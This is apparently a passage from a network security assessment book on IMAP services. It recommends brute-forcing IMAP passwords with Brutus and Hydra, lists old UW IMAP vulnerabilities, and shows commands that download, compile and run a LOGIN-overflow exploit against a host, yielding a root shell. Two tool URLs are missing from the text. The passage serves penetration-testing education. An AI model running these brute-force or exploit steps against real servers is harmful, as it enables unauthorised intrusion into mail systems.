Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage their email.
Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) invented and maintains IMAP, which currently uses IMAP4rev1 as the standard server protocol (RFC 3501).
As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and Hydra do an excellent job brute-forcing valid user-account passwords from both Unix-based and Win32 GUI environments. As mentioned earlier, they can be downloaded from:
Like POP-3, IMAP services are notoriously susceptible to brute-force password-grinding attack because they don't pay attention to account lockout policies and often don't log unsuccessful authentication attempts.
Since 1997, a handful of remotely exploitable security vulnerabilities within IMAP2bis and IMAP4rev1 services have been publicized, which are summarized in Table 10-5.
CVE name |
Date |
Notes |
---|---|---|
CVE-1999-0005 |
17/07/1998 |
Washington University IMAP 4 (IMAP4rev1 10.234) and prior AUTHENTICATE command overflow |
CVE-1999-0042 |
02/03/1997 |
Washington University IMAP 4.1beta and prior LOGIN command overflow |
CVE-2000-0233 |
27/03/2000 |
SuSE Linux IMAP server allows remote attackers to bypass IMAP authentication and gain privileges |
CVE-2000-0284 |
16/04/2000 |
Washington University IMAP 4.7 (IMAP4rev1 12.264) post-authentication LIST command overflow |
CVE-2002-0379 |
10/05/2002 |
Washington University IMAP 2000c and prior post-authentication BODY command overflow |
The serious unauthenticated vulnerabilities in IMAP services are CVE-1999-0005 and CVE-1999-0042. Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:
The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz.
After finding the correct offset to use with the exploit script, it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11.
# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz # tar xfz imaps.tar.gz # cd imaps # make cc -O2 -o imaps imaps.c imaps.c: In function `imap': imaps.c:35: warning: function returns address of local variable # ls hey.sh imaps* imaps.c include/ makefile other/ readme # ./imaps 192.168.0.35 100 Connecting to 192.168.0.35 on port 143. * OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02 id; uid=0(root) gid=0(root) groups=0(root)